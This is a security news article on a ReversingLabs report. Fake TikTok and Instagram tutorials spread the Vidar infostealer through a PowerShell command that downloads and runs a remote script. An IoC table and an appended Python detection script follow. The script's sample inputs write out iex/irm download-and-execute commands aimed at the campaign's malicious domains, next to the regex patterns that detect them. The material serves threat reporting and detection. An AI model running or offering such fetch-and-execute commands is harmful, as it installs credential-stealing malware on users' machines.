Hackers Abuse TikTok and Instagram Reels to Spread Malware via Fake Free Software Tutorials

Cybercriminals are now turning to short-form video platforms as a new attack surface, using fake software tutorials on TikTok and Instagram Reels to push malware onto unsuspecting users.

The tactic is simple but remarkably effective: create polished, convincing videos that promise free access to popular premium software, then quietly funnel viewers toward malicious downloads.

The attack works because it blends in so naturally. These videos look no different from the millions of tech tips and how-to clips that flood social media every single day.

With thousands of views and hundreds of likes behind them, victims have little reason to question whether the content is genuine. That false sense of credibility is exactly what the attackers count on.

Analysts at ReversingLabs identified and analyzed two distinct campaign methods used in this threat, both managing to reach massive audiences by gaming social media recommendation algorithms.

The research was led by threat intelligence researcher Zaria Vuksan, who documented how attackers expertly exploit platform engagement mechanics to spread malware at scale across multiple platforms.

Both campaigns share the same end goal: send users to a third-party website hosting malicious software disguised as a free premium app. What differs is how each campaign builds trust before delivering the payload.

The malware deployed through these videos is Vidarstealer, a well-known infostealer offered as a service that steals login credentials, financial data, and session tokens from infected devices.

Vidarstealer received an update in October of last year, making it more evasive and harder to detect. With a lifetime license priced at around $300, it remains a favorite tool for threat actors across many campaigns.

ReversingLabs said in a report shared with Cyber Security News (CSN) that this combination of widespread social media reach and accessible malware tools creates a genuinely dangerous threat environment for everyday users and organizations alike.

Hackers Abuse TikTok and Instagram Reels

The first campaign uses accounts with usernames like “windows.tips” or “windows.insights,” paired with a blue and white profile image designed to closely mimic the official Windows social media icon.

These accounts post professional tutorial videos with AI-generated voiceovers, walking users through typing a specific PowerShell command that supposedly unlocks Spotify Premium for free.

That command instructs Windows to silently download and run a script from a remote address. When users follow the steps without question, they unknowingly execute a file identified as Vidarstealer.

What makes this especially dangerous is how clean and authoritative the videos appear, with many racking up over 100,000 views alongside thousands of saves and shares.

Screenshot of the malicious user profile showing a blue crown outline on a white background (Source - ReversingLabs)

The second campaign takes a far more casual approach to luring victims. These accounts post short, vague clips showing premium Spotify features while playing trending music, then encourage viewers to comment out of curiosity.

Image of a lure video with 1,699 saves, 1,581 likes, and 974 shares, with over 109,000 total views (Source - ReversingLabs)

Once engagement builds, the attacker replies with directions to malicious sites like pluginchad[.]xyz or d4ug[.]site, which offer fake software downloads hidden behind survey walls.

Why These Social Engineering Attacks Are Difficult to Stop

What makes this threat especially stubborn is that social media platforms are not well equipped to stop it. Researchers at ReversingLabs attempted to report malicious Instagram accounts as scams, and every single report was rejected.

Even when content is flagged, platforms act slowly, and by the time an account is removed, the damage is already done.

Attackers also suppress community warnings with considerable ease. If a viewer leaves a comment alerting others to the scam, the attacker simply deletes it and blocks that user right away.

This dynamic makes genuine self-policing nearly impossible, leaving the full burden of defense squarely on organizations and individual users to handle.

Practical defenses do exist and should be acted on now. Organizations should regularly audit who holds installation permissions on work devices, since some software promoted in these videos is framed as useful professional tools.

Phishing training programs must stay current and explicitly cover social media as an attack vector, not just email. Users should report suspicious accounts consistently, since higher report volumes do increase the likelihood of removal and can slow an attacker’s momentum.

Indicators of Compromise (IoCs):

| Type | Indicator | Description |
| --- | --- | --- |
| Hash | 03bbc4fa1fd784276da135ab62fef85aaddea66e6eb176d7e59c3398f818b153 | SHA-256 hash of build.exe, identified as Vidarstealer |
| Domain | pluginchad[.]xyz | Malicious site hosting fake free software downloads |
| Domain | maxapk[.]xyz | Malicious site hosting fake free software downloads |
| Domain | d4ug[.]site | Fake site claiming to "Unlock premium games and AI tools" |
| Domain | slmgr[.]sh | Domain used in malicious PowerShell command delivery |
| Domain | msget[.]run | Domain used to deliver Vidarstealer via the iex/irm PowerShell command |
| Account | tiktok[.]com/@windows.tips1 | Malicious TikTok account used in tutorial campaign |
| Account | tiktok[.]com/@windows.insight | Malicious TikTok account used in tutorial campaign |
| Account | tiktok[.]com/@davidcooksey47 | Malicious TikTok account associated with campaign |
| Account | tiktok[.]com/@tracyhughe | Malicious TikTok account associated with campaign |
| Account | tiktok[.]com/@mr.capcut.pro2 | Malicious TikTok account associated with campaign |
| Account | instagram[.]com/wtips404 | Malicious Instagram account used in campaign |
| Account | instagram[.]com/wndwstips | Malicious Instagram account used in campaign |
| Account | instagram[.]com/epemberton369 | Malicious Instagram account used in campaign |

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
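The download-and-execute PowerShell pattern described in the tutorial campaign and the defanging note above both lend themselves to a small triage script. The following is an added example written for this page, not code from ReversingLabs or Cyber Security News: it keeps the table's domains defanged in the source, refangs them only in memory at the point of comparison, scans PowerShell script-block text of the kind Windows records under event ID 4104 for the iex/irm cradle, and matches any listed domain. The function names and the sample script blocks are constructed assumptions, not material from the report.

```python
import re

# Defanged domains copied from the article's IoC table. Everything else here
# (function names, sample log text) is constructed for this added example.
DEFANGED_DOMAINS = [
    "pluginchad[.]xyz",
    "maxapk[.]xyz",
    "d4ug[.]site",
    "slmgr[.]sh",
    "msget[.]run",
]


def refang(indicator: str) -> str:
    """Restore a defanged indicator to its matchable form, in memory only.

    The shared copy (ticket, report, wiki) stays defanged; refang at the
    point of comparison inside the analysis tool.
    """
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def defang(indicator: str) -> str:
    """Neutralise an indicator before writing it into a report or ticket."""
    if "[.]" in indicator:  # already defanged, leave it alone
        return indicator
    return indicator.replace(".", "[.]").replace("http", "hxxp")


# PowerShell is case-insensitive. The cradle the article describes is
# Invoke-RestMethod / Invoke-WebRequest (aliases irm / iwr) feeding
# Invoke-Expression (alias iex), in either operand order.
_WEB = r"(?:irm|iwr|invoke-restmethod|invoke-webrequest)"
_EXEC = r"(?:iex|invoke-expression)"
CRADLE_RE = re.compile(
    rf"\b{_EXEC}\b.*?\b{_WEB}\b|\b{_WEB}\b.*?\|\s*{_EXEC}\b",
    re.IGNORECASE | re.DOTALL,
)

# One compiled pattern for all listed domains; \b also catches subdomain forms.
DOMAIN_RE = re.compile(
    "|".join(r"\b" + re.escape(refang(d)) + r"\b" for d in DEFANGED_DOMAINS),
    re.IGNORECASE,
)


def analyze_script_block(text: str) -> dict:
    """Return the two facts a triage analyst wants about one script block."""
    domains = sorted({m.group(0).lower() for m in DOMAIN_RE.finditer(text)})
    return {
        "cradle": bool(CRADLE_RE.search(text)),
        "domains": domains,
        "domains_defanged": [defang(d) for d in domains],
    }


def scan_script_blocks(blocks):
    """Return (index, result) for every block suspicious on either ground."""
    hits = []
    for i, block in enumerate(blocks):
        result = analyze_script_block(block)
        if result["cradle"] or result["domains"]:
            hits.append((i, result))
    return hits


# Constructed sample ScriptBlockText values, shaped like what event ID 4104
# records. Domains are refanged at runtime so this page text stays defanged.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object",
    f"iex (irm https://{refang('msget[.]run')}/EXAMPLE-PATH)",
    f"Invoke-WebRequest -Uri https://{refang('d4ug[.]site')}/EXAMPLE | Invoke-Expression",
    "Install-Module -Name Pester -Scope CurrentUser",
]

if __name__ == "__main__":
    for index, result in scan_script_blocks(SAMPLE_SCRIPT_BLOCKS):
        print(index, "cradle" if result["cradle"] else "", result["domains_defanged"])
```

Feeding real 4104 events into `scan_script_blocks` is a matter of exporting the ScriptBlockText field from the event log or SIEM; the cradle check fires independently of the domain list, so it still flags the same technique once the attackers rotate to new domains, while the domain check catches the known infrastructure even when the command is obfuscated enough to evade the pattern.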

The post Hackers Abuse TikTok and Instagram Reels to Spread Malware via Fake Free Software Tutorials appeared first on Cyber Security News.
Tushar Subhra Dutta